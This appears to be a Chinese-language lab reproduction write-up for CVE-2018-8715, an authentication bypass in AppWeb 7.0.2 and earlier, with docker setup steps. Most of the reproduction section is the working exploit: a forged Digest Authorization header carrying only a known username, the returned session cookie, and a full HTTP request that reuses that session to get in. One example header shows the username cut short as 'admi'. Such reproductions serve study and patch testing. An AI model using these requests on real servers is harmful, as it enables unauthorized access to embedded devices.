AppWeb认证绕过漏洞(CVE-2018-8715)
0x01漏洞概述
AppWeb 是一个基于开源 GPL 协议的嵌入式 Web 服务器,该协议由 Embedthis Software LLC开发和维护。它是用C / C++编写的,几乎可以在任何现代操作系统上运行。当然,它旨在为嵌入式设备提供 Web 应用程序容器。
可以将 AppWeb 配置为进行身份验证,其中包括以下三种身份验证方法:
(1)basic、传统 HTTP 基本身份验证。
(2)digest,改进了 HTTP 基本身份验证。在此模式下,Cookie 将用于身份验证,而不是Authorization标头。
(3)form、基于HTML的表单身份验证。
在 7.0.3 之前的 Appweb 版本中,存在与 中的 authCondition 函数相关的逻辑缺陷。使用伪造的 HTTP 请求,可以绕过和登录类型的身份验证。
0x02影响版本
AppWeb 7.0.2及早期版本
0x03漏洞环境
1、启动漏洞环境
docker-compose up -d
2、访问漏洞环境
(1)查看环境的端口
docker ps
(2)访问漏洞环境
ip地址如下:
http://your-ip:8080
3、复现完成后,删除漏洞环境
docker-compose down
0x04复现过程
1、利用burpsuite抓包
发送到重发器中,构造一个请求头,并发送如下数据包。
利用漏洞需要知道一个已存在的用户名,当前环境下用户名为admin
Authorization: Digest username=admi
2、若用户名已存在,就会返回一个session
-http-session-=3::http.session::27702ce7c74f4c5bf34be38ced068584
3、在发送一次请求,带上session和username,完整请求如下:
GET / HTTP/1.1
Host: 192.168.207.132:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Authorization: Digest username="admin"
-http-session-=3::http.session::27702ce7c74f4c5bf34be38ced068584
Content-Length: 18
username=admin
查看响应包中信息,访问成功。